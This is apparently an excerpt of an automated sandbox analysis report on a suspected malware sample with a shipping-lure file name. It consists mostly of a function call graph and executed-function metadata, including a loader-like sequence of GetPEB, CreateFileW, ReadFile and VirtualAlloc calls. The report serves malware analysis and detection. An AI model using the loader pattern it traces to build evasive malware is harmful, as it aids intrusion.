87952 417f25 __vswprintf_l 10 API calls 87951->87952 87952->87949 87953->87926 87954->87927 87956 414c82 _fprintf 87955->87956 87957 414cbb _fprintf 87956->87957 87958 414cc3 87956->87958 87959 414c96 __call_reportfault 87956->87959 87957->87626 87960 415471 __lock_file 47 API calls 87958->87960 87982 417f77 46 API calls __getptd_noexit 87959->87982 87961 414ccb 87960->87961 87968 414aba 87961->87968 87964 414cb0 87983 417f25 10 API calls __vswprintf_l 87964->87983 87970 414ad8 __call_reportfault 87968->87970 87974 414af2 87968->87974 87969 414ae2 88035 417f77 46 API calls __getptd_noexit 87969->88035 87970->87969 87970->87974 87979 414b2d 87970->87979 87972 414ae7 88036 417f25 10 API calls __vswprintf_l 87972->88036 87984 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87974->87984 87976 414c38 __call_reportfault 88038 417f77 46 API calls __getptd_noexit 87976->88038 87977 414139 _fprintf 46 API calls 87977->87979 87979->87974 87979->87976 87979->87977 87985 41dfcc 87979->87985 88015 41d8f3 87979->88015 88037 41e0c2 46 API calls 3 library calls 87979->88037 87982->87964 87983->87957 87984->87957 87986 41dfd8 _fprintf 87985->87986 87987 41dfe0 87986->87987 87988 41dffb 87986->87988 88108 417f8a 46 API calls __getptd_noexit 87987->88108 87990 41e007 87988->87990 87993 41e041 87988->87993 88110 417f8a 46 API calls __getptd_noexit 87990->88110 87991 41dfe5 88109 417f77 46 API calls __getptd_noexit 87991->88109 87996 41e063 87993->87996 87997 41e04e 87993->87997 87995 41e00c 88111 417f77 46 API calls __getptd_noexit 87995->88111 88000 41ae56 ___lock_fhandle 48 API calls 87996->88000 88113 417f8a 46 API calls __getptd_noexit 87997->88113 88003 41e069 88000->88003 88001 41e014 88112 417f25 10 API calls __vswprintf_l 88001->88112 88002 41e053 88114 417f77 46 API calls __getptd_noexit 88002->88114 88006 41e077 88003->88006 88007 41e08b 88003->88007 88005 41dfed _fprintf 88005->87979 88039 41da15 88006->88039 88115 417f77 46 API calls __getptd_noexit 88007->88115 88011 41e083 88117 41e0ba LeaveCriticalSection __unlock_fhandle 88011->88117 88012 41e090 88116 417f8a 46 API calls __getptd_noexit 88012->88116 88016 41d900 88015->88016 88019 41d915 88015->88019 88121 417f77 46 API calls __getptd_noexit 88016->88121 88018 41d905 88122 417f25 10 API calls __vswprintf_l 88018->88122 88021 41d94a 88019->88021 88026 41d910 88019->88026 88118 420603 88019->88118 88023 414139 _fprintf 46 API calls 88021->88023 88024 41d95e 88023->88024 88025 41dfcc __read 59 API calls 88024->88025 88027 41d965 88025->88027 88026->87979 88027->88026 88028 414139 _fprintf 46 API calls 88027->88028 88029 41d988 88028->88029 88029->88026 88030 414139 _fprintf 46 API calls 88029->88030 88031 41d994 88030->88031 88031->88026 88032 414139 _fprintf 46 API calls 88031->88032 88033 41d9a1 88032->88033 88034 414139 _fprintf 46 API calls 88033->88034 88034->88026 88035->87972 88036->87974 88037->87979 88038->87972 88040 41da31 88039->88040 88041 41da4c 88039->88041 88042 417f8a __write_nolock 46 API calls 88040->88042 88043 41da5b 88041->88043 88046 41da7a 88041->88046 88045 41da36 88042->88045 88044 417f8a __write_nolock 46 API calls 88043->88044 88047 41da60 88044->88047 88049 417f77 __vswprintf_l 46 API calls 88045->88049 88048 41da98 88046->88048 88059 41daac 88046->88059 88050 417f77 __vswprintf_l 46 API calls 88047->88050 88051 417f8a __write_nolock 46 API calls 88048->88051 88060 41da3e 88049->88060 88053 41da67 88050->88053 88055 41da9d 88051->88055 88052 41db02 88054 417f8a __write_nolock 46 API calls 88052->88054 88056 417f25 __vswprintf_l 10 API calls 88053->88056 88057 41db07 88054->88057 88058 417f77 __vswprintf_l 46 API calls 88055->88058 88056->88060 88061 417f77 __vswprintf_l 46 API calls 88057->88061 88062 41daa4 88058->88062 88059->88052 88059->88060 88063 41dae1 88059->88063 88064 41db1b 88059->88064 88060->88011 88061->88062 88065 417f25 __vswprintf_l 10 API calls 88062->88065 88063->88052 88071 41daec ReadFile 88063->88071 88066 416b04 __malloc_crt 46 API calls 88064->88066 88065->88060 88068 41db31 88066->88068 88074 41db59 88068->88074 88075 41db3b 88068->88075 88069 41dc17 88070 41df8f GetLastError 88069->88070 88078 41dc2b 88069->88078 88072 41de16 88070->88072 88073 41df9c 88070->88073 88071->88069 88071->88070 88082 417f9d __dosmaperr 46 API calls 88072->88082 88087 41dd9b 88072->88087 88076 417f77 __vswprintf_l 46 API calls 88073->88076 88079 420494 __lseeki64_nolock 48 API calls 88074->88079 88077 417f77 __vswprintf_l 46 API calls 88075->88077 88080 41dfa1 88076->88080 88081 41db40 88077->88081 88078->88087 88088 41dc47 88078->88088 88091 41de5b 88078->88091 88083 41db67 88079->88083 88084 417f8a __write_nolock 46 API calls 88080->88084 88085 417f8a __write_nolock 46 API calls 88081->88085 88082->88087 88083->88071 88084->88087 88085->88060 88086 413748 _free 46 API calls 88086->88060 88087->88060 88087->88086 88089 41dcab ReadFile 88088->88089 88096 41dd28 88088->88096 88092 41dcc9 GetLastError 88089->88092 88101 41dcd3 88089->88101 88090 41ded0 ReadFile 88093 41deef GetLastError 88090->88093 88099 41def9 88090->88099 88091->88087 88091->88090 88092->88088 88092->88101 88093->88091 88093->88099 88094 41ddec MultiByteToWideChar 88094->88087 88095 41de10 GetLastError 88094->88095 88095->88072 88096->88087 88097 41dda3 88096->88097 88098 41dd96 88096->88098 88104 41dd60 88096->88104 88097->88104 88105 41ddda 88097->88105 88100 417f77 __vswprintf_l 46 API calls 88098->88100 88099->88091 88103 420494 __lseeki64_nolock 48 API calls 88099->88103 88100->88087 88101->88088 88102 420494 __lseeki64_nolock 48 API calls 88101->88102 88102->88101 88103->88099 88104->88094 88106 420494 __lseeki64_nolock 48 API calls 88105->88106 88107 41dde9 88106->88107 88107->88094 88108->87991 88109->88005 88110->87995 88111->88001 88112->88005 88113->88002 88114->88001 88115->88012 88116->88011 88117->88005 88119 416b04 __malloc_crt 46 API calls 88118->88119 88120 420618 88119->88120 88120->88021 88121->88018 88122->88026 88126 4148b3 GetSystemTimeAsFileTime __aulldiv 88123->88126 88125 442c6b 88125->87629 88126->88125 88127->87636 88128->87641 88129->87641 88135 45272f __tzset_nolock _wcscpy 88130->88135 88131 414d04 61 API calls __fread_nolock 88131->88135 88132 44afef GetSystemTimeAsFileTime 88132->88135 88133 4528a4 88133->87558 88133->87559 88134 4150d1 81 API calls _fseek 88134->88135 88135->88131 88135->88132 88135->88133 88135->88134 88137 44b1bc 88136->88137 88139 44b1ca 88136->88139 88138 4149c2 116 API calls 88137->88138 88138->88139 88140 4149c2 116 API calls 88139->88140 88141 44b1d8 88139->88141 88142 44b1e1 88139->88142 88143 44b2db 88140->88143 88141->87586 88171 4321a4 88142->88171 88143->88142 88145 44b2e9 88143->88145 88147 44b2f6 88145->88147 88150 414a46 __fcloseall 82 API calls 88145->88150 88146 44b224 88148 44b253 88146->88148 88149 44b228 88146->88149 88147->87586 88175 43213d 88148->88175 88152 44b235 88149->88152 88155 414a46 __fcloseall 82 API calls 88149->88155 88150->88147 88153 44b245 88152->88153 88156 414a46 __fcloseall 82 API calls 88152->88156 88153->87586 88154 44b25a 88157 44b260 88154->88157 88158 44b289 88154->88158 88155->88152 88156->88153 88160 44b26d 88157->88160 88162 414a46 __fcloseall 82 API calls 88157->88162 88185 44b0bf 88158->88185 88163 44b27d 88160->88163 88165 414a46 __fcloseall 82 API calls 88160->88165 88161 44b28f 88194 4320f8 88161->88194 88162->88160 88163->87586 88165->88163 88167 44b2a2 88169 44b2b2 88167->88169 88170 414a46 __fcloseall 82 API calls 88167->88170 88168 414a46 __fcloseall 82 API calls 88168->88167 88169->87586 88170->88169 88172 4321cb 88171->88172 88174 4321b4 __tzset_nolock _memmove 88171->88174 88173 414d04 __fread_nolock 61 API calls 88172->88173 88173->88174 88174->88146 88176 4135bb _malloc 46 API calls 88175->88176 88177 432150 88176->88177 88178 4135bb _malloc 46 API calls 88177->88178 88179 432162 88178->88179 88180 4135bb _malloc 46 API calls 88179->88180 88181 432174 88180->88181 88182 4320f8 46 API calls 88181->88182 88183 432189 88181->88183 88184 432198 88182->88184 88183->88154 88184->88154 88186 44b18e 88185->88186 88190 44b0da 88185->88190 88204 43206e 79 API calls 88186->88204 88188 442caf 61 API calls 88188->88190 88189 44b194 88189->88161 88190->88186 88190->88188 88193 44b19d 88190->88193 88202 44b040 61 API calls 88190->88202 88203 442d48 79 API calls 88190->88203 88193->88161 88195 432109 88194->88195 88198 43210f 88194->88198 88196 413748 _free 46 API calls 88195->88196 88196->88198 88197 432122 88200 432135 88197->88200 88201 413748 _free 46 API calls 88197->88201 88198->88197 88199 413748 _free 46 API calls 88198->88199 88199->88197 88200->88167 88200->88168 88201->88200 88202->88190 88203->88190 88204->88189 88205->87489 88206->87491 88207->87509 88208->87509 88209->87509 88210->87503 88211->87509 88212->87509 88213->87514 88214->87522 88215->87523 88216->87523 88266 410160 88217->88266 88219 41012f GetFullPathNameW 88220 410147 ctype 88219->88220 88220->87350 88222 4102cb SHGetDesktopFolder 88221->88222 88225 410333 _wcsncpy 88221->88225 88223 4102e0 _wcsncpy 88222->88223 88222->88225 88224 41031c SHGetPathFromIDListW 88223->88224 88223->88225 88224->88225 88225->87353 88227 4101bb 88226->88227 88234 425f4a 88226->88234 88228 410160 52 API calls 88227->88228 88229 4101c7 88228->88229 88270 410200 52 API calls 2 library calls 88229->88270 88230 4114ab __wcsicoll 58 API calls 88230->88234 88232 4101d6 88271 410200 52 API calls 2 library calls 88232->88271 88233 425f6e 88233->87355 88234->88230 88234->88233 88236 4101e9 88236->87355 88238 40f760 128 API calls 88237->88238 88239 40f584 88238->88239 88240 429335 88239->88240 88241 40f58c 88239->88241 88242 4528bd 118 API calls 88240->88242 88243 40f598 88241->88243 88244 429358 88241->88244 88245 42934b 88242->88245 88296 4033c0 113 API calls 7 library calls 88243->88296 88297 434034 86 API calls _wprintf 88244->88297 88248 429373 88245->88248 88249 42934f 88245->88249 88253 4115d7 52 API calls 88248->88253 88252 431e58 82 API calls 88249->88252 88250 429369 88250->88248 88251 40f5b4 88251->87352 88252->88244 88265 4293c5 ctype 88253->88265 88254 42959c 88262 401b10 52 API calls 88262->88265 88265->88254 88265->88262 88272 444af8 88265->88272 88275 44b41c 88265->88275 88282 402780 88265->88282 88290 4022d0 88265->88290 88298 44c7dd 64 API calls 3 library calls 88265->88298 88267 410167 _wcslen 88266->88267 88268 4115d7 52 API calls 88267->88268 88269 41017e _wcscpy 88268->88269 88269->88219 88270->88232 88271->88236 88273 4115d7 52 API calls 88272->88273 88276 44b429 88275->88276 88296->88251 88297->88250 88298->88265 88300 402417 88299->88300 88301 402539 ctype 88299->88301 88300->88301 88302 4115d7 52 API calls 88300->88302 88301->87359 88304 402443 88302->88304 88303 4115d7 52 API calls 88305 4024b4 88303->88305 88304->88303 88305->88301 88307 4022d0 52 API calls 88305->88307 88328 402880 95 API calls 2 library calls 88305->88328 88307->88305 88312 401566 88308->88312 88309 401794 88329 40e9a0 90 API calls 88309->88329 88312->88309 88313 4010a0 52 API calls 88312->88313 88314 40167a 88312->88314 88313->88312 88315 4017c0 88314->88315 88330 45e737 90 API calls 3 library calls 88314->88330 88315->87361 88317 40bc70 52 API calls 88316->88317 88326 40d451 88317->88326 88318 40d50f 88333 410600 52 API calls 88318->88333 88320 427c01 88334 45e737 90 API calls 3 library calls 88320->88334 88321 40e0a0 52 API calls 88321->88326 88323 401b10 52 API calls 88323->88326 88324 40d519 88324->87364 88326->88318 88326->88320 88326->88321 88326->88323 88326->88324 88331 40f310 53 API calls 88326->88331 88332 40d860 91 API calls 88326->88332 88328->88305 88329->88314 88330->88315 88331->88326 88332->88326 88333->88324 88334->88324 88335->87377 88336->87378 88338 42c5fe 88337->88338 88353 4091c6 88337->88353 88339 40bc70 52 API calls 88338->88339 88338->88353 88340 42c64e InterlockedIncrement 88339->88340 88341 42c665 88340->88341 88346 42c697 88340->88346 88343 42c672 InterlockedDecrement Sleep InterlockedIncrement 88341->88343 88341->88346 88342 42c737 InterlockedDecrement 88344 42c74a 88342->88344 88343->88341 88343->88346 88347 408f40 VariantClear 88344->88347 88345 42c731 88345->88342 88346->88342 88346->88345 88348 408e80 VariantClear 88346->88348 88349 42c752 88347->88349 88350 42c6cf 88348->88350 88615 410c60 VariantClear ctype 88349->88615 88352 45340c 85 API calls 88350->88352 88354 42c6db 88352->88354 88353->87438 88355 402160 52 API calls 88354->88355 88356 42c6e5 88355->88356 88357 45340c 85 API calls 88356->88357 88358 42c6f1 88357->88358 88396 40afc4 88395->88396 88397 40b156 88395->88397 88398 40afd5 88396->88398 88399 42d1e3 88396->88399 88622 45e737 90 API calls 3 library calls 88397->88622 88404 40a780 199 API calls 88398->88404 88420 40b11a ctype 88398->88420 88623 45e737 90 API calls 3 library calls 88399->88623 88402 42d1f8 88408 408f40 VariantClear 88402->88408 88403 40b143 88403->87438 88405 40b00a 88404->88405 88405->88402 88409 40b012 88405->88409 88407 42d4db 88407->88407 88408->88403 88410 40b04a 88409->88410 88411 40b094 ctype 88409->88411 88412 42d231 VariantClear 88409->88412 88419 40b05c ctype 88410->88419 88624 40e270 VariantClear ctype 88410->88624 88413 40b108 88411->88413 88416 42d425 ctype 88411->88416 88412->88419 88413->88420 88625 40e270 VariantClear ctype 88413->88625 88414 42d45a VariantClear 88414->88420 88416->88414 88416->88420 88417 4115d7 52 API calls 88417->88411 88419->88411 88419->88417 88420->88403 88626 45e737 90 API calls 3 library calls 88420->88626 88422 408fff 88421->88422 88425 40900d 88421->88425 88673 403ea0 52 API calls __cinit 88422->88673 88426 42c3f6 88425->88426 88428 40a780 199 API calls 88425->88428 88429 42c44a 88425->88429 88432 42c47b 88425->88432 88433 42c4cb 88425->88433 88434 42c564 88425->88434 88437 42c548 88425->88437 88441 409112 88425->88441 88443 42c528 88425->88443 88445 4090df 88425->88445 88446 4090ea 88425->88446 88455 4090f2 ctype 88425->88455 88675 4534e3 52 API calls 88425->88675 88677 40c4e0 199 API calls 88425->88677 88676 45e737 90 API calls 3 library calls 88426->88676 88428->88425 88678 45e737 90 API calls 3 library calls 88429->88678 88679 451b42 61 API calls 88432->88679 88627 47faae 88433->88627 88438 408f40 VariantClear 88434->88438 88683 45e737 90 API calls 3 library calls 88437->88683 88438->88455 88439 42c491 88439->88455 88680 45e737 90 API calls 3 library calls 88439->88680 88441->88437 88448 40912b 88441->88448 88682 45e737 90 API calls 3 library calls 88443->88682 88445->88446 88450 408e80 VariantClear 88445->88450 88451 408f40 VariantClear 88446->88451 88448->88455 88674 403e10 53 API calls 88448->88674 88450->88446 88451->88455 88453 40914b 88454 408f40 VariantClear 88453->88454 88454->88455 88455->87438 88457 425c87 88456->88457 88458 40d15f 88456->88458 88459 425cc7 88457->88459 88460 425ca1 TranslateAcceleratorW 88457->88460 88458->87438 88460->88458 88462 42602f 88461->88462 88465 40d17f 88461->88465 88462->87438 88463 40d18c 88463->87438 88464 42608e IsDialogMessageW 88464->88463 88464->88465 88465->88463 88465->88464 88873 430c46 GetClassLongW 88465->88873 88468 4096c6 _wcslen 88467->88468 88469 40a70c ctype _memmove 88468->88469 88470 4115d7 52 API calls 88468->88470 88473 4013a0 52 API calls 88469->88473 88471 4096fa _memmove 88470->88471 88472 4115d7 52 API calls 88471->88472 88474 40971b 88472->88474 88475 4297aa 88473->88475 88474->88469 88476 409749 CharUpperBuffW 88474->88476 88481 40976a ctype 88474->88481 88477 4115d7 52 API calls 88475->88477 88476->88481 88478 4297d1 _memmove 88477->88478 88900 45e737 90 API calls 3 library calls 88478->88900 88487 4097e5 ctype 88481->88487 88875 47dcbb 201 API calls 88481->88875 88482 408f40 VariantClear 88483 42ae92 88482->88483 88901 410c60 VariantClear ctype 88483->88901 88485 42aea4 88486 409aa2 88486->88478 88489 4115d7 52 API calls 88486->88489 88492 409afe 88486->88492 88487->88478 88487->88486 88488 40a689 88487->88488 88491 40c2c0 52 API calls 88487->88491 88498 429a46 VariantClear 88487->88498 88504 408f40 VariantClear 88487->88504 88508 4115d7 52 API calls 88487->88508 88511 40a6af ctype _memmove 88487->88511 88515 40ba10 52 API calls 88487->88515 88520 4299d9 88487->88520 88524 429abd 88487->88524 88531 40a780 199 API calls 88487->88531 88536 42a452 88487->88536 88876 40c4e0 199 API calls 88487->88876 88878 40e270 VariantClear ctype 88487->88878 88490 4115d7 52 API calls 88488->88490 88489->88492 88490->88511 88491->88487 88493 409b2a 88492->88493 88494 4115d7 52 API calls 88492->88494 88495 429dbe 88493->88495 88557 409b4d ctype _memmove 88493->88557 88882 40b400 VariantClear VariantClear ctype 88493->88882 88496 429d31 88494->88496 88497 429dd3 88495->88497 88883 40b400 VariantClear VariantClear ctype 88495->88883 88501 429d42 88496->88501 88879 44a801 52 API calls 88496->88879 88497->88557 88498->88487 88499 409fd2 88554 42a3f5 88499->88554 88504->88487 88508->88487 88518 4115d7 52 API calls 88511->88518 88515->88487 88516 42a42f 88888 45e737 90 API calls 3 library calls 88516->88888 88518->88469 88523 408f40 VariantClear 88520->88523 88526 4299e2 88523->88526 88524->87438 88877 410c60 VariantClear ctype 88526->88877 88531->88487 88533 44a801 52 API calls 88533->88557 88536->88482 88537 402780 52 API calls 88537->88557 88541 40a780 199 API calls 88541->88557 88542 408e80 VariantClear 88542->88557 88544 401980 53 API calls 88544->88557 88550 41130a 51 API calls __cinit 88550->88557 88551 4115d7 52 API calls 88551->88557 88557->88469 88557->88499 88557->88516 88557->88533 88557->88537 88557->88541 88557->88542 88557->88544 88557->88550 88557->88551 88557->88554 88558 409c95 88557->88558 88885 45f508 52 API calls 88557->88885 88886 403e10 53 API calls 88557->88886 88558->87438 88590 40a650 ctype 88590->87438 88594->87438 88595->87388 88596->87393 88597->87438 88598->87438 88599->87438 88600->87438 88601->87445 88602->87445 88603->87445 88604->87445 88605->87445 88606->87445 88607->87445 88608->87445 88609->87445 88610->87438 88611->87385 88615->88353 88622->88399 88623->88402 88624->88419 88625->88420 88626->88407 88628 408e80 VariantClear 88627->88628 88636 47fb02 88628->88636 88631 47fc59 88632 40a780 199 API calls 88631->88632 88635 47fc6a 88632->88635 88633 47fc2b 88637 408f40 VariantClear 88633->88637 88635->88633 88639 47fc7d 88635->88639 88640 47fc8c 88635->88640 88636->88631 88636->88633 88641 408f40 VariantClear 88636->88641 88650 47fcd4 88636->88650 88654 408e80 VariantClear 88636->88654 88668 47fc1d 88636->88668 88684 475a67 88636->88684 88712 47b291 88636->88712 88723 46fe32 VariantClear 88636->88723 88638 47fc33 88637->88638 88642 408f40 VariantClear 88638->88642 88726 45e737 90 API calls 3 library calls 88639->88726 88644 40ba10 52 API calls 88640->88644 88641->88636 88645 47fc3b 88642->88645 88647 47fc98 88644->88647 88646 408f40 VariantClear 88645->88646 88648 47fc43 88646->88648 88727 47b2f4 144 API calls 88647->88727 88725 410c60 VariantClear ctype 88648->88725 88656 408f40 VariantClear 88650->88656 88652 47fca7 88654->88636 88658 47fcdc 88656->88658 88660 408f40 VariantClear 88658->88660 88662 47fce4 88660->88662 88664 408f40 VariantClear 88662->88664 88666 47fcec 88664->88666 88724 45e538 90 API calls 3 library calls 88668->88724 88673->88425 88674->88453 88675->88425 88676->88455 88677->88425 88678->88455 88679->88439 88680->88455 88682->88455 88683->88434 88685 475ae5 88684->88685 88688 475ac5 88684->88688 88730 45e737 90 API calls 3 library calls 88685->88730 88687 475afe 88689 408f40 VariantClear 88687->88689 88688->88685 88690 475b42 88688->88690 88691 402780 52 API calls 88688->88691 88694 475b06 88689->88694 88692 402780 52 API calls 88690->88692 88691->88688 88703 475b60 88692->88703 88693 475c7c 88695 408f40 VariantClear 88693->88695 88694->88636 88696 40c2c0 52 API calls 88696->88703 88697 40a780 199 API calls 88697->88703 88699 475cc7 88700 408f40 VariantClear 88699->88700 88705 475ca8 88700->88705 88701 40ba10 52 API calls 88701->88703 88702 475cd5 88732 45e737 90 API calls 3 library calls 88702->88732 88703->88693 88703->88696 88703->88697 88703->88699 88703->88701 88703->88702 88704 408f40 VariantClear 88703->88704 88709 475ca0 88703->88709 88731 40c4e0 199 API calls 88703->88731 88704->88703 88705->88636 88711 408f40 VariantClear 88709->88711 88711->88705 88713 47b2e7 88712->88713 88714 47b2a5 88712->88714 88713->88636 88733 40e710 88714->88733 88723->88636 88724->88633 88726->88633 88727->88652 88730->88687 88731->88703 88734 408f40 VariantClear 88733->88734 88735 40e71b 88734->88735 88736 4115d7 52 API calls 88735->88736 88737 40e729 88736->88737 88873->88465 88875->88481 88876->88487 88877->88590 88878->88487 88879->88501 88882->88495 88883->88497 88885->88557 88886->88557 88888->88536 88900->88536 88901->88485 88902 42d154 88906 480a8d 88902->88906 88904 42d161 88905 480a8d 199 API calls 88904->88905 88905->88904 88907 480ae4 88906->88907 88908 480b26 88906->88908 88910 480aeb 88907->88910 88911 480b15 88907->88911 88909 40bc70 52 API calls 88908->88909 88933 480b2e 88909->88933 88913 480aee 88910->88913 88914 480b04 88910->88914 88939 4805bf 199 API calls 88911->88939 88913->88908 88916 480af3 88913->88916 88938 47fea2 199 API calls __itow_s 88914->88938 88937 47f135 199 API calls 88916->88937 88917 40e0a0 52 API calls 88917->88933 88920 408f40 VariantClear 88922 481156 88920->88922 88921 480aff 88921->88920 88923 408f40 VariantClear 88922->88923 88924 48115e 88923->88924 88924->88904 88925 480ff5 88945 45e737 90 API calls 3 library calls 88925->88945 88926 40e710 53 API calls 88926->88933 88927 401980 53 API calls 88927->88933 88929 40c2c0 52 API calls 88929->88933 88930 40a780 199 API calls 88930->88933 88932 408e80 VariantClear 88932->88933 88933->88917 88933->88921 88933->88925 88933->88926 88933->88927 88933->88929 88933->88930 88933->88932 88940 45377f 52 API calls 88933->88940 88941 45e951 53 API calls 88933->88941 88942 40e830 53 API calls 88933->88942 88943 47925f 53 API calls 88933->88943 88944 47fcff 199 API calls 88933->88944 88937->88921 88938->88921 88939->88921 88940->88933 88941->88933 88942->88933 88943->88933 88944->88933 88945->88921 88946 3f3c1cb 88947 3f3c1d2 88946->88947 88948 3f3c270 88947->88948 88949 3f3c1da 88947->88949 88966 3f3cb20 9 API calls 88948->88966 88953 3f3be80 88949->88953 88952 3f3c257 88954 3f39870 GetPEB 88953->88954 88955 3f3bf1f 88954->88955 88958 3f3bf79 VirtualAlloc 88955->88958 88960 3f3bf5d 88955->88960 88964 3f3c080 CloseHandle 88955->88964 88965 3f3c090 VirtualFree 88955->88965 88967 3f3cd90 GetPEB 88955->88967 88957 3f3bf50 CreateFileW 88957->88955 88957->88960 88959 3f3bf9a ReadFile 88958->88959 88958->88960 88959->88960 88963 3f3bfb8 VirtualAlloc 88959->88963 88961 3f3c17a 88960->88961 88962 3f3c16c VirtualFree 88960->88962 88961->88952 88962->88961 88963->88955 88963->88960 88964->88955 88965->88955 88966->88952 88968 3f3cdba 88967->88968 88968->88957 88969 42b14b 88976 40bc10 88969->88976 88971 42b159 88972 4096a0 330 API calls 88971->88972 88973 42b177 88972->88973 88987 44b92d VariantClear 88973->88987 88975 42bc5b 88977 40bc24 88976->88977 88978 40bc17 88976->88978 88980 40bc2a 88977->88980 88981 40bc3c 88977->88981 88979 408e80 VariantClear 88978->88979 88983 40bc1f 88979->88983 88984 408e80 VariantClear 88980->88984 88982 4115d7 52 API calls 88981->88982 88986 40bc43 88982->88986 88983->88971 88985 40bc33 88984->88985 88985->88971 88986->88971 88987->88975 88988 425b2b 88993 40f000 88988->88993 88992 425b3a 88994 4115d7 52 API calls 88993->88994 88995 40f007 88994->88995 88996 4276ea 88995->88996 89002 40f030 88995->89002 89001 41130a 51 API calls __cinit 89001->88992 89003 40f039 89002->89003 89004 40f01a 89002->89004 89032 41130a 51 API calls __cinit 89003->89032 89006 40e500 89004->89006 89007 40bc70 52 API calls 89006->89007 89008 40e515 GetVersionExW 89007->89008 89009 402160 52 API calls 89008->89009 89010 40e557 89009->89010 89033 40e660 89010->89033 89016 427674 89019 4276c6 GetSystemInfo 89016->89019 89018 40e5cd GetCurrentProcess 89054 40ef20 LoadLibraryA GetProcAddress 89018->89054 89020 4276d5 GetSystemInfo 89019->89020 89024 40e5e0 89024->89020 89047 40efd0 89024->89047 89025 40e629 89051 40ef90 89025->89051 89028 40e641 FreeLibrary 89029 40e644 89028->89029 89030 40e653 FreeLibrary 89029->89030 89031 40e656 89029->89031 89030->89031 89031->89001 89032->89004 89034 40e667 89033->89034 89035 42761d 89034->89035 89036 40c600 52 API calls 89034->89036 89037 40e55c 89036->89037 89038 40e680 89037->89038 89039 40e687 89038->89039 89040 427616 89039->89040 89041 40c600 52 API calls 89039->89041 89042 40e566 89041->89042 89042->89016 89043 40ef60 89042->89043 89044 40e5c8 89043->89044 89045 40ef66 LoadLibraryA 89043->89045 89044->89018 89044->89024 89045->89044 89046 40ef77 GetProcAddress 89045->89046 89046->89044 89048 40e620 89047->89048 89049 40efd6 LoadLibraryA 89047->89049 89048->89019 89048->89025 89049->89048 89050 40efe7 GetProcAddress 89049->89050 89050->89048 89055 40efb0 LoadLibraryA GetProcAddress 89051->89055 89053 40e632 GetNativeSystemInfo 89053->89028 89053->89029 89054->89024 89055->89053 89056 425b5e 89061 40c7f0 89056->89061 89060 425b6d 89096 40db10 52 API calls 89061->89096 89063 40c82a 89097 410ab0 6 API calls 89063->89097 89065 40c86d 89066 40bc70 52 API calls 89065->89066 89067 40c877 89066->89067 89068 40bc70 52 API calls 89067->89068 89069 40c881 89068->89069 89070 40bc70 52 API calls 89069->89070 89071 40c88b 89070->89071 89072 40bc70 52 API calls 89071->89072 89073 40c8d1 89072->89073 89074 40bc70 52 API calls 89073->89074 89075 40c991 89074->89075 89098 40d2c0 52 API calls 89075->89098 89077 40c99b 89099 40d0d0 53 API calls 89077->89099 89079 40c9c1 89080 40bc70 52 API calls 89079->89080 89081 40c9cb 89080->89081 89100 40e310 53 API calls 89081->89100 89083 40ca28 89084 408f40 VariantClear 89083->89084 89085 40ca30 89084->89085 89086 408f40 VariantClear 89085->89086 89087 40ca38 GetStdHandle 89086->89087 89088 429630 89087->89088 89089 40ca87 89087->89089 89088->89089 89090 429639 89088->89090 89095 41130a 51 API calls __cinit 89089->89095 89101 4432c0 57 API calls 89090->89101 89092 429641 89102 44b6ab CreateThread 89092->89102 89094 42964f CloseHandle 89094->89089 89095->89060 89096->89063 89097->89065 89098->89077 89099->89079 89100->89083 89101->89092 89102->89094 89103 44b5cb 58 API calls 89102->89103 89104 425b6f 89109 40dc90 89104->89109 89108 425b7e 89110 40bc70 52 API calls 89109->89110 89111 40dd03 89110->89111 89117 40f210 89111->89117 89114 40dd96 89115 40ddb7 89114->89115 89120 40dc00 52 API calls 2 library calls 89114->89120 89116 41130a 51 API calls __cinit 89115->89116 89116->89108 89121 40f250 RegOpenKeyExW 89117->89121 89119 40f230 89119->89114 89120->89114 89122 425e17 89121->89122 89123 40f275 RegQueryValueExW 89121->89123 89122->89119 89124 40f2c3 RegCloseKey 89123->89124 89125 40f298 89123->89125 89124->89119 89126 40f2a9 RegCloseKey 89125->89126 89127 425e1d 89125->89127 89126->89119

                                      Executed Functions

                                      Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 004096C1
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 0040970C
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                      • _memmove.LIBCMT ref: 00409D96
                                      • _memmove.LIBCMT ref: 0040A6C4
                                      • _memmove.LIBCMT ref: 004297E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                      • String ID:
                                      • API String ID: 2383988440-0
                                      • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                      • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                      Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
